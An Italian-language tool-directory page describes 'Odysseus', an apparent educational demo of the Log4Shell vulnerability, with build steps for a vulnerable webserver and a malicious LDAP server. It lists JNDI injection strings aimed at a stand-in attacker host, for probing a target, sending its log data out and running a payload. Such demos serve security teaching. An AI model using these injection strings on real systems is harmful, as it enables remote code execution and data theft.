Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Odysseus — Una demo della vulnerabilità Log4Shell (CVE-2021-44228). | Kitploit
Strumenti/GitHubGitHub/roshanshibu/odysseus
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlApprendimento e FormazioneSviluppo Payload
GitHubroshanshibu/odysseus

Odysseus

Una demo della vulnerabilità Log4Shell (CVE-2021-44228).

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Odysseus

Una demo della vulnerabilità Log4Shell (CVE-2021-44228).

Istruzioni di compilazione

Il webserver vulnerabile e il server LDAP malevolo sono stati entrambi compilati e testati su JDK 1.8.0_181.

Webserver dei Buoni

  1. All'interno di goodguys, esegui gradlew bootJar
  2. Esegui il webserver vulnerabile usando java -jar build/libs/goodguys-0.0.1-SNAPSHOT.jar

Server LDAP/Web dei Cattivi

  1. All'interno di badguys, esegui mvn package
  2. Esegui il server malevolo usando java -jar .\target\evil-server.jar

Nota: Windows Defender potrebbe spostare silenziosamente target\classes\Exploit.class in quarantena.

Payload Maligno

I comandi malevoli sono definiti all'interno di Exploit.java.

Trigger di Iniezione

InputOsservazioni
${jndi:ldap://evil-server-hostname:389/Recon}Verifica se il target è vulnerabile ascoltando una richiesta di connessione al server LDAP.
${jndi:ldap://evil-server-hostname:389/Recon [log4j Pattern Layout(s)]Aggiungi qualsiasi layout di pattern log4j valido per raccogliere i dati dal target e visualizzarli nel terminale dell'attaccante.

Riferimenti

https://securityboulevard.com/2019/01/exploiting-jndi-injections-in-java/ https://logging.apache.org/log4j/1.2/apidocs/org/apache/log4j/PatternLayout.html
https://www.ibm.com/blog/how-to-detect-patch-log4j-vulnerability/

Scarica lo strumento
${jndi:ldap://evil-server-hostname:389/Exploit}Esegui il payload.